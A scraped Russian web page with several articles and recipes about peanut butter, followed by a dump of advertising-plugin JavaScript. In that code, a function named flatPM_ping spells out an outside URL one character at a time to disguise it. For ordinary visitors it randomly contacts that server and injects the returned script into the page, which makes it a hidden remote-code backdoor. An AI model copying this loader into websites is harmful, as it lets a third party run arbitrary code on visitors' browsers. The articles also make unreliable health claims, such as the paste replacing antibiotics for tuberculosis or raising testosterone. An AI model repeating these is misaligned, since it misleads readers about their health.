Арахисовая паста

Арахисовая паста

В советские времена никто не слышал об арахисовой пасте. Дефицитный продукт практически невозможно было достать, разве что обменяв на что-то дорогое – например, на меховую шапку.

После того, как развалился Советский Союз, начали появляться новые товары, одним из них и была арахисовая паста, за которой сразу же закрепилась слава полезного, но высококалорийного продукта. Давайте разберемся, в чем же состоит польза арахисовой пасты и как правильно ее употреблять.

Состав и польза арахисовой пасты

По статистике, в мире выращивается около 30 миллионов тонн субкультуры, основная часть идет на производство масла. Кроме того, из скорлупы делают удобрения, изоляционный материал, а сам земляной орех используют для изготовления пластмассы и динамита. Арахисовая паста стала практически культовым продуктом в Америке. В городе Плейнс (штат Джорджия) даже воздвигли памятник арахису – рядом с заводом по его переработке красуется четырехметровый улыбающийся орех.

Своим появлением арахисовая паста обязана неизвестному врачу-диетологу, который в конце 19 века пытался получить новый суперфуд, полезный для вегетарианцев и худеющих. В 1904 году в Америке уже были налажены первые заводы по производству пасты. Правильно приготовленный продукт полезнее, чем сырые орехи: дело в том, что термическая обработка усиливает полезные свойства арахиса.

Арахис не зря называют продуктом бедняков – он дешевый и калорийный, способен быстро утолить голод. В случае скудного питания арахисовая паста признана ВОЗ одним из основных продуктов. В пасте есть множество витаминов и микроэлементов, которые оказывают благотворное влияние на организм. Среди полезных веществ, содержащихся в продукте, выделяют:

  1. Полиненасыщенные жирные кислоты (линолиевая кислота, фолиевая кислота, омега 3/6/9).
  2. Незаменимые аминокислоты.
  3. Витамины А, Е, К, группы В, а также минеральные вещества, в числе которых железо, фосфор, кальций, магний, натрий, селен и другие.
  4. Антиоксиданты.
  5. Клетчатка и пищевые волокна.

Благодаря такому составу, арахисовая паста благотворно влияет на организм, снижая риски возникновения опасных заболеваний. При регулярном потреблении продукта уменьшается возможность появления сердечно-сосудистых заболеваний и сахарного диабета второго типа, снижается уровень холестерина, улучшается иммунитет и работа желудочно-кишечного тракта. Паста является эффективным заменителем антибиотиков при лечении туберкулеза – к таким выводам пришли ученые из Швейцарии.

Польза арахисовой пасты неоспорима для вегетарианцев, продукт помогает организму восполнять запасы белка. Кроме того, паста подходит для спортсменов: употребление арахиса помогает укрепить мышцы, нормализовать процесс расщепления жиров и работу печени, восстановить нервную систему при стрессах. Арахисовая паста повышает уровень сератонина в крови и является отличным антидепрессантом.

Удивительно, но, несмотря на высокую калорийность, диетологи включают арахисовую пасту в меню при похудении. Дело в том, что постоянное употребление продукта увеличивает уровень тестестерона в крови, что способствует регуляции обмена веществ и сжиганию жира. Кроме того в составе содержится ресвератрол, который помогает сбросить вес.

Для того чтобы получить максимальную пользу от продукта, нужно обратить внимание на состав баночки при покупке. Чем меньше ингредиентов, тем больше польза арахисовой пасты. Правильная паста содержит арахис, соль и сахар, остальные добавки уже нужны для продления срока годности и удешевления производства. Кстати, существует два вида пасты, и для покупателей придуманы специальные различия в упаковке: банки с красной крышкой содержат в себе кремообразный продукт, а с синей крышкой – пасту с кусочками арахиса.

Есть ли вред от употребления арахисовой пасты?

Арахис является высокоаллергенным продуктом, поэтому стоит воздержаться от его употребления при наличии пищевой непереносимости. Кроме того, арахисовая паста содержит в 100 граммах продукта около 587 калорий, поэтому людям с нарушением обмена веществ и ожирением нужно ограничить потребление продукта. Также по некоторым данным беременным женщинам лучше воздержаться от потребления пасты из земляного ореха, так как существуют риски возникновения астмы у малыша.

Некоторые люди боятся употреблять данный продукт, в психологии даже выделена арахибатирофобия – боязнь того, что арахисовая паста прилипнет к небу. Видимо, это вызвано тем, что у кошки от употребления пасты могут слепиться челюсти. Поэтому угощать лакомством своего питомца не следует.

Влияние на вес зависит от того, как употреблять арахисовую пасту. При оптимальной дозировке ее можно кушать практически всем людям. Так например, в период похудения будет достаточно 1 столовой ложки в день, для поддержания веса порция составит 1 столовую и 1 чайную ложку, а для набора веса и мышечной массы можно есть 2 столовых ложки в день.

Что приготовить из арахисовой пасты и как правильно ее употреблять?

Каждый год в Америке съедают около 300 миллионов килограмм арахисовой пасты, и чаще всего ее употребляют на завтрак. Говорят, что даже во время своего полета на Луну Алан Гепард ел арахисовую пасту в космосе в виде спрессованных кубиков. На самом деле помимо привычного бутерброда с хлебом есть множество вариаций употребления арахисовой пасты.

С чем едят арахисовую пасту? В период похудения можно сочетать ее с кашами или фруктами. Арахисовая паста отлично подходит к тостам, лавашу, хлебцам, крекерам. Продукт также можно добавить в творог или использовать в качестве начинки для пирога. Если же вы не боитесь набрать вес, можете добавить ложку пасты к мороженому или блинчикам – пикантный вкус продукта добавит новые нотки к привычным блюдам. Часто арахисовая паста используется в соусах и маринаде для мяса, а еще продукт можно использовать вместо масла при жарке или выпечке. Главное, знать меру в употреблении, хотя иногда очень сложно остановиться и ограничить себя лишь одной ложкой лакомства.

2 комментария

это очень вкусный и полезный продукт советую всем употреблять можно вместо сладости

Арахисовая паста – разве это вкусно?

Арахисовая паста на вкус

Арахисовая паста, как ни крути, продукт у нас в стране не слишком известный, хотя в последние годы все меняется и любителей этой снеди становится все больше. И частенько случается, что, попробовав впервые арахисовую пасту, человек кривится и говорит: «эта ваша арахисовая паста… разве это вкусно?»

Кто-то после первого знакомства все-таки распробовал пасту, а иные так и остаются ее противниками. Да, на вкус и цвет, конечно же, товарищей нет. В то же время, справедливости ради, стоит отметить, что арахисовая паста – это намазка на хлеб, поэтому в ложке она будет не слишком вкусна: консистенция ее, как правило, плотная, основную часть составляют мелко растертые орехи, они не расходятся во рту и создают ощущение чего-то шероховато-тяжелого. Единственное, с чем лично я могу сравнить арахисовую пасту – это с темным шоколадом 99 %. Вот он такой же шершавый, плотный, почти несладкий. Поэтому на вопрос арахисовая паста вкусная или нет? – трудно ответить однозначно. Конечно, она вкусная, но ее вкус не всем будет по душе. Точно так же, как далеко не всем нравится мед, или шоколад.

Что такое арахисовая паста?

Если Вас интересует, как делается арахисовая паста и что это такое, могу сказать, что в мелко растертый жареный арахис добавляют небольшое количество растительного масла (для создания пастообразной консистенции), а также немного соли и сахара. Поэтому сам арахис составляет до 99 % всего количества пасты и ее основные свойства определяются почти исключительно им.

Арахисовая паста на диете

По составу (и по вкусу) арахисовая паста бывает разная. Есть и с шоколадными наполнителями, с медом и сухофруктами, а есть почти диетическая – даже без сахара. Кто-то удивится: как это можно назвать диетическим продукт, половину которого составляет жир? А вот можно. Имея в виду, что жир арахисовой пасты – растительный, состоящий практически целиком из ненасыщенных жирных кислот, которые помогают ускорить жировой обмен, понижают количество вредного холестерина и приносят организму еще много приятного и полезного. Так что ничего удивительного: арахисовая паста на диете вполне допустима и многими очень востребована. Хотя впрочем, необходимо уточнять – какая диета имеется в виду. Если диета, по каким-то причинам требует максимально снизить количество жиров в рационе – то да, арахисовая паста тут будет не к месту. Если же диета не настолько специфическая, а преследует целью уменьшить калорийность пищи, оздоровить рацион и исключить продукты с вредными животными жирами (сало, жирное мясо, сливочное масло), то здесь арахисовая паста будет весьма к месту. Она, конечно, очень калорийна – это необходимо обязательно учитывать – но еще раз подчеркнем, что жиры в этом продукте растительные, полезные, и они должны составлять не менее половины суточного потребления жиров, а лучше – еще больше.

С чем едят арахисовую пасту?

В основном – с хлебом. Кто-то скажет, что это же весьма неполезно: хлеб и сам по себе продукт диетически сомнительный, а еще и с жирной арахисовой пастой… Но я бы сказал, что польза и вред определяются в первую очередь уместностью и дозировкой. Даже для спортсменов, находящихся на сушке, допустимы (и необходимы) полезные жиры, ну а уж для тех, кто набирает массу, бутерброд с арахисовой пастой будет только в пользу.

В принципе, учитывая, что арахисовая паста почти полностью состоит из арахиса, можно решительно утверждать, что ее уместно не только намазывать на хлеб, но и применять любыми другими способами: добавлять в салат, кашу, выпечку или коктейли. Паста способна придать ощутимый арахисово-ореховый вкус любому блюду. Везде вкусна арахисовая паста и с чем едят эту вкусняшку – вопрос индивидуального вкуса.

Арахисовая паста: рецепты с ней

Самое простое (и традиционное), что можно приготовить с арахисовой пастой – это бутерброд. Но это может быть как обычный бутерброд, так и сэндвич.

Бутер № 1. Энергия здоровья.

На кусочек цельнозернового хлеба намазываем арахисовую пасту (1 ч.л.), кладем кружок яблока (с вырезанной серединкой) и посыпаем щепоткой молотой корицы.

В принципе, здесь варьировать состав можно как угодно. Можно даже заменить яблоко грушей, бананом, или клубникой, а корицу – имбирем, мятой, тертым сыром, шоколадом или взбитыми сливками – все на Ваш вкус.

Бутер № 2. Итальянский завтрак.

Арахисовую пасту тщательно смешиваем с растертым чесноком (1 зубчик на 50 г), намазываем на хлеб, кладем тонкий ломтик помидора, пару листиков базилика и сверху прикрываем кусочком сыра пармезан. Ну, пармезан можно заменить моцареллой, а базилик оливками, или к бутеру добавить бокал какого-нибудь кьянти.

Бутер № 3. Заряд энергии для школьника.

Намазываем арахисовую пасту на хлеб, кладем вперемежку черный изюм и ломтики банана. Накрываем сверху вторым намазанным кусочком, после чего поджариваем с обеих сторон до появления золотистой корочки. Если что, бананы можно заменить яблоком или грушей, изюм – курагой, а пасту взять с добавлением шоколада, ну или просто посыпать какао.

Экзотическая овсянка

Если дети устали от обычного «Геркулеса» и требуют на завтрак неведомого, приготовьте им овсянку «Экзотик». Для этого сварите кашу на воде, затем смешайте с арахисовой пастой (1 ст.л. на порцию), посыпьте дроблеными орехами и шоколадной крошкой, а также добавьте несколько ягод клубники (или вишни). Успех обеспечен!

Грибы с овощами в арахисовом соусе

Обжарьте на сковороде лук, затем добавьте морковь, кабачки и цветную капусту. Когда все обжарится, добавляйте грибы, 2-3 столовые ложки арахисовой пасты (на 0,5 кг грибов), 1 чайную ложку карри или чили. Тушите до готовности.

Арахисовый торт

Для начала нужно выпечь коржи с добавлением арахисовой пасты. Потребуется примерно 100 г на 1,5 стакана муки. К примеру, в блендере начните взбивать яичные белки с сахаром, потом добавьте желтки, сливочное масло, арахисовую пасту, муку. После того, как коржи будут готовы, промажьте их кремом и сложите друг на друга. Крем делается из арахисовой пасты, сливочного масла и сахара – их нужно взбить венчиком до легкой однородной консистенции. При желании между некоторыми слоями можно добавить сгущенку, мед или варенье, дробленые орехи. Сверху торт можно обмазать все тем же кремом (или арахисовой пастой), украсить шоколадной крошкой, взбитыми сливками.

Арахисовый соус

Смешать арахисовую пасту (6 ст.л.), лимонный сок (1 ст.л.), сахар (2 ч.л.), соевый соус (1 ст.л.), чеснок (1 зубчик), сушеный лук (1 ст.л.), мелко порубленный перец чили (3 стручка), добавить 0,5 стакана воды. Соус отлично подходит к мясу, рыбе, тушеным овощам или грибам, к блюдам из морепродуктов.

Салат «Привет от китайских товарищей»

Мелко порезать пекинский салат, положить в блюдо, сверху добавить ломтики помидора, посыпать резаным укропом и мелко порезанным острым перцем (1 стручок), в середину выливаем соус (2 ст.л. арахисовой пасты, 1 ч.л. лимонного сока, щепотка соли, или 1 ч.л. соевого соуса). Сверху посыпать жареным арахисом.

Вообще, арахисовую пасту можно добавлять и в печенье, и в разнообразные десерты, в запеченные окорочка или рыбу, в лапшу – куда угодно. Она придаст новый оттенок вкуса давно знакомым блюдам. Экспериментируйте и приятного аппетита!

Блюда с арахисовой пастой

Подборка рецептов блюд с арахисовой пастой с фото и пошаговыми инструкциями. Мы расскажем и покажем, что можно приготовить из арахисовой пасты на собственной кухне!

Похожие подборки рецептов

Упорядочить рецепты по .

Рецепты с арахисовой пастой.
Рецептов в разделе: 24 шт.

Ингредиенты

Арахисовая паста – 150 г

Масло сливочное – 100 г

Соль морская – 1/4 ч.л.

Яйцо куриное – 1 шт.

Мука пшеничная – 200 г

Разрыхлитель – 1 ч.л.

Ингредиенты

Адыгейский сыр – около 150 г

Сельдерей – 1-2 стебля

Листовой салат – по вкусу

Заправка арахисовая – 3 ст.л.

Варианты заправок:

Ароматное растительное масло

Йогурт с зеленью

Арахисовая паста с маслом

Ингредиенты

Арахисовая паста – 100 г или по вкусу

Перец сладкий – 1 шт.

Томатный соус – 3 ст.л.

Растительное масло – 2-3 ст.л.

Вода – около 1 стакана

Смесь острых перцев – по вкусу

Для подачи:

Ингредиенты

Мука пшеничная в/с – 500 г

Масло сливочное – 80 г

Паста арахисовая – 60 г

Изюм темный – 50 г

Яйца куриные СО – 2 шт.

Дрожжи сухие активные – 2 ч.л.

Фундук сушеный – 50 г

Ингредиенты

Яйцо куриное – 1 шт.

Масло сливочное – 75 г

Для сырного слоя:

Творожный сливочный сыр – 550 г

Арахисовая паста – 100 г

Яйца куриные – 2 шт.

Сливки 33% – 200 г

Для украшения:

Шоколад горький – 60 г

Масло сливочное – 45 г

Ингредиенты

Арахисовая паста – 4 ст.л.

Соевый соус – 4 ст.л.

Кунжутное масло – 1,5 ст.л. (можно подсолнечное)

Уксус (рисовый или яблочный) – 3 ч.л.

Рисовое сладкое вино – 1,5 ст.л.

Семечки очищенные – 3 ст.л.

Ингредиенты

Арахисовая паста – 70 г

Соевый соус – 4 ст.л.

Рисовый уксус – 1 ст.л.

Масло кунжутное – 2 ч.л.

Соус острый – по вкусу

Сахар (по желанию) – 1 ч.л.

Кунжутные семечки – 1 ч.л.

Мирин (при наличии) – 3 ч.л.

Ингредиенты

Хлеб из цельнозерновой муки – 120 г

Арахисовая паста – 30 г

Джем клубничный – 45 г

Масло подсолнечное рафинированное – 30 мл

Ингредиенты

Сладкий картофель – 250 г

Арахисовая паста – 2 ст.л.

Перец чили – 1 шт.

Чеснок – 2 зубка

Лук репчатый – 1 шт.

Томатное пюре (помидоры) – 3 ст.л.

Бульонный куриный кубик – 1 шт. или 250 мл мясного бульона

Оливковое масло – 2 ст.л.

Ингредиенты

Хлеб белый – 4 ломтика

Арахисовая паста – 1 ст.л.

Масло сливочное – 1 ст.л.

Ингредиенты

Молоко коровье (жирность 3,2%) – 300 мл

Творог (жирность 9%) – 100 г

Паста арахисовая – 60 г

Корица (молотая) – 1/2 ч.л.

Ингредиенты

Урбеч арахисовый (шоколадный) – 3 ст.л.

Мука льняная – 30 г

Мука овсяная – 200 г

Джем абрикосовый – 6 ст.л.

Стружка кокосовая – 3 ст.л.

Ингредиенты

Овсяные хлопья – 0.5 стакана

Молоко – 1 стакан

Арахисовая паста – 1 ч.л.

Сливочное масло – 10 г

Ингредиенты

Арахисовая паста – 50 г

Ингредиенты

Молоко – около 0,5 л

Мука пшеничная – 1 стакан

Мука ржаная – 0,5 стакана

Арахисовая паста – 2-4 ч.л.

Сахар – по вкусу

Соль – 1 щепотка

Растительное масло – для жарки

Ингредиенты

Стейк рыбы – 300 грамм;

Кальмар – 300 грамм;

Рис отварной – 2 стакана;

Шпинат свежий – 1 пучек;

Кунжутная паста – 2 ст.л;

Паста арахисовая – 3 ст.л;

Лук репчатый – 1 шт;

Паприка сладкая – 1 ст.л;

Чеснок – 4-6 долек;

Соль, перец черный – по вкусу;

Сода пищевая – 1/3 ч.л;

Масло растительное – 10 мл.

Ингредиенты

Арахисовая паста – 2 ст.л.

Рафинированное подсолнечное масло – 60 мл

Грецкие орехи – 150 г

Мука пшеничная – 250 г

Разрыхлитель – 1 ч.л.

Шоколадные капли – 50 г

Яйца куриные – 2 шт.

Ингредиенты

Арахисовая паста – 4 ст.л.

Чеснок – 2 зубка

Кунжутное масло – 1 ст.л.

Лимонный сок – 1 ст.л.

Самбал улек – 1 ст.л.

Кетьяп Манис (или соевый соус) – 2 ст.л.

Ингредиенты

Урбеч арахисовый – 200 г

Уксус рисовый (белый) – 2 ст.л.

Соус соевый – 4 ст.л.

Мед (жидкий) – 1 ч.л.

Перец кайенский – 1 ч.л. (без горки)

Имбирь (молотый) – 1 ч.л.

Чеснок – 1 зубчик

Ингредиенты

Семена чиа – 1 ч.л.

Семена льна – 1 ст.л.

Арахисовая паста – 2 ст.л.

Овсяные хлопья – 2 ст.л.

Ингредиенты

Бумага рисовая – 6 шт.

Перец болгарский (красный) – 1/2 шт.

Перец болгарский (желтый) – 1/2 шт.

Перец болгарский (зеленый) – 1/2 шт.

Капуста краснокочанная – 1/4 шт.

Кинза – по вкусу

Соус:

Паста арахисовая – 1/2 стакана

Соус соевый – 2 ст.л.

Сок лимонный – 2 ст.л.

Перец чили (молотый) – 1/2 ч.л.

Имбирь свежий (тертый) – 1 ч.л.

Ингредиенты

Вода питьевая (охлажденная) – 250 мл

Мука кедровая – 70 г

Шпинат (замороженный) – 2 горсти

Паста арахисовая – 1 ст.л. с горкой

Сироп – по желанию

Орехи кедровые – для украшения

Мята – для украшения

Ингредиенты

Паста арахисовая – 100 г

Ванилин – на кончике ножа

Масло сливочное – 30 г

Яйца куриные – 2 шт.

Мука пшеничная – 170 г

Разрыхлитель – 1 ч.л.

Шоколад (шоколадные капли) – 20 г (по вкусу)

Ингредиенты

Овсяные хлопья – 50 г

Арахисовая паста – 1 ст.л.

Поделитесь подборкой рецептов с друзьями

АЙМКУК © 2007-2020 год. Все права защищены.
Использование материалов сайта без письменного разрешения, запрещено законом об Авторских правах Гражданского Кодекса Российской Федерации от 18 декабря 2006 года N 230-ФЗ

Как сделать арахисовую пасту дома

Не знаете, как приготовить полезную арахисовую пасту? Вам нужен только один ингредиент плюс кухонный комбайн или мощный блендер. Приготовив единожды арахисовую пасту в домашних условиях, вы больше никогда не захотите покупать ее в магазине. Этот рецепт намного вкуснее, полезнее и дешевле магазинного аналога.

Гладкая, кремообразная масса готовится всего за 15 минут, очень легко сделать.

Как приготовить арахисовую пасту

Домашний продукт из арахиса предпочтителен, потому что вы сами контролируете ингредиенты, которые добавляете. Но также вы сможете создавать различные вкусы, смешивая всевозможные компоненты.

Главное условие того, чтобы намазка получилась — мощный комбайн или блендер. А также свежий арахис. Рассмотрим, другие необходимые условия для получения вкусной арахисовой пасты:

Жареный арахис

Прокаленный в духовке арахис способствует быстрому извлечению масла из бобовых, делает орехи более ароматными. Ядра запекаются около 10 минут в духовке при температуре 160-170 градусов. Арахис приобретет золотистый оттенок, что положительно скажется на цвете пасты. Но, в принципе, можно готовить пасту из сырых орехов.

Как перемолоть арахис

Добавляйте теплый арахис в блендер. Орехи пройдут через несколько этапов изменения текстуры, прежде чем приобретут пастообразную массу.

  1. Вначале нужно измельчить орехи одним нажатием на кнопку блендера — получим мелкую крошку.
  2. Второй раз включаем блендер на минуту — масса станет похожа на мокрый песок, начнет выступать масло из орехов.
  3. Включаем еще на минуту — арахисовое масло слепит частички орехов, появятся твердые кусочки, которые возможно будут прилипать к стенкам блендера. Выключите машину и соберите массу с боков — если нужно.
  4. Последний раз включаем блендер на самую высокую скорость. Получим густую кремовую текстуру.

Если блендер будет сильно перегреваться, отключите его и дайте отдохнуть минут 10, затем продолжите.

Добавки

После того, как мы добились ровной кремовой текстуры, можно добавлять дополнительные ингредиенты. Такие, как мед, какао-порошок — для получения шоколадной арахисовой пасты, корицу или масло (сливочного, кокосового).Так арахисовая паста приобретет иной вкус. Можно ограничиться только щепоткой соли. Если же вы хотите сделать арахисовую пасту сладкой, делайте без сахара, а с более полезными подсластителями. Например: с медом, кленовым сиропом, финиками. В таком случае, обязательно добавляем немного масла, иначе кремовая текстура собьется в комок.

Арахисовую массу с добавками нужно перемолоть в блендере в течении 1-2 минут. Затем дать остыть пасте, блюдо готово.

Как хранить

Домашний рецепт арахисовой пасты имеет выход — 75 г. Перелить спред в герметическую емкость и хранить в холодильнике 3 недели. Домашний продукт сохраняется в холодильнике намного лучше магазинного. Это связано с тем, что домашняя паста не стоит на прилавках долгое время.

Рецепт:

Гладкая, кремовая паста готовится из одного ингредиента. Узнайте, как правильно приготовить.

Ингредиенты:

  • 150 г арахиса — используем несоленые орехи, очищенные от кожуры (жареные или сырые);
  • щепотка морской соли — по желанию.

Пошаговый способ:

  1. Арахис лучше покупать свежий и сырой. Прокалываем его в духовке 10 минут при температуре 160-170 градусов, периодически перемешивая.
  2. Теплые зерна (без шелухи) засыпаем в блендер или комбайн.
  3. Измельчаем арахис на предельной скорости.
  4. Вначале орехи дробятся в крошку, не прекращаем работу блендера.
  5. Начнет вырабатываться масло из орехов, крошка станет мокрой.
  6. Через 1 минуту масса станет ликой, кусочки будут застревать. В таком случае, можно отключить блендер и собрать массу с боков.
  7. Опять включаем технику, непрерывно взбиваем. Через 3 минуты масса станет гладкой и однородной.
  8. По желанию добавляем морскую соль и опять взбиваем. Намазка станет тягучей.
  9. Перекладываем получившуюся теплую арахисовую пасту в контейнер или банку. Как только масса остынет, ее можно поставить в холодильник и хранить там около 3 недель.

Если вы хотите положить специи — корицу, какао-порошок, или подсластитель, делайте это на этапе добавления соли.

В случае нехватки мощности домашнего блендера, чтобы приблизиться к нужной консистенции, необходимо добавить растительное масло —10% от массы продукта, т. е. 15 мл (1 столовая ложка).

Пищевая ценность 1 столовой ложки (20 г) арахисовой пасты:

Калорийность Жиры Белки Углеводы Натрий Калий
106 9 г 5 г 3 г 3 мг 131 мг

3 г углеводов, включают 1 г клетчатки и 1 г сахара.

9 г жиров, включают насыщенные жиры — 1 г, полиненасыщенные — 3 г, мононенасыщенные — 4 г.

И также, арахисовая намазка станет прекрасным дополнением, вместе с фруктами и ягодами, в качестве начинки к овсяноблину.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};